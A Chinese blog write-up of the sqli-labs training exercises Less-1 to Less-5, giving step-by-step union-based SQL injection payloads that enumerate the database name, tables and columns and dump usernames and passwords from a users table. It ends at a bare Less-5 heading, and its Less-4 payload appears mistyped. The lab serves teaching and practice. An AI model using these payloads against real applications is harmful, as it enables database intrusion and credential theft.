sqli-labs(1)

SQL注入
sqli-labs
发布日期:   2022-03-14
更新日期:   2022-03-22
文章字数:   537
阅读时长:   2 分
阅读次数:  

1、Less-1

From:https://blog.csdn.net/weixin_45728976/article/details/103932264

基于GET的单引号的字符型

(1)注入字符的判断

?id=1

单引号

于是尝试用'进行注入

?id=1' and 1=1 --+将单引号闭合实现and 1=1逻辑判断,--+注释后面的单引号

正常返回

(2)确定注入字符后,对字段进行判断order by

?id=1' order by 4--+发现字段为4时开始报错,可得一共有三个字段

(3)判断数据的注入点

?id=-1' union select 1,2,3--+

2和3注入点

(4)数据库名信息收集

?id=-1' union select 1,database(),user()--+

数据库名和用户

(5)查找security数据库下表的信息

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

此数据库下的表

(6)查找users表下列的信息

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

表下的列信息

(7)查询password列下的信息

?id=-1' union select 1,2,group_concat(password) from users --+

列下的信息

2、Less2

基于GET的整型

(1)注入字符判断

?id=1 and 1=1在返回的语句中可以发现是整型

整型

(2)字段判断order by

?id=1 order by 4可知一共有三个字段

字段判断

(3)注入点判断

?id=-1 union select 1,2,3这里注入点的判断需要报错,可知2,3为注入点

2和3

(4)数据库信息查询

?id=-1 union select 1,database(),user()

数据库名,用户

(5)在security数据库下的表信息查询

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'

该数据库下的表

(6)查询users表下的列信息

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'

users表下的列信息

(7)查询users表下password列下的password、username

?id=-1 union select 1,group_concat(username),group_concat(password) from users

列下信息

3、Less3

基于GET的')的字符型

?id=1 and 1=1可以发现是单引号和括号的组合字符

单引号变形

于是用?id=1') and 1=1%23进行绕过,这里是GET型参数因此无法用#号,因此可以用#的URL编码%23进行注释

%23

接下来再用基本方法查询即可

4、Less4

基于GET的双引号和括号字符型

?id=1 and 1=1

双引号括号

?id=1'') and 1=1--+

绕过

5、Less5

基于GET的单引号错误回显注入

文章作者: 17mie32
文章链接: http://example.com/2022/03/14/sqli-labs-1/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 17mie32 !
SQL注入
  目录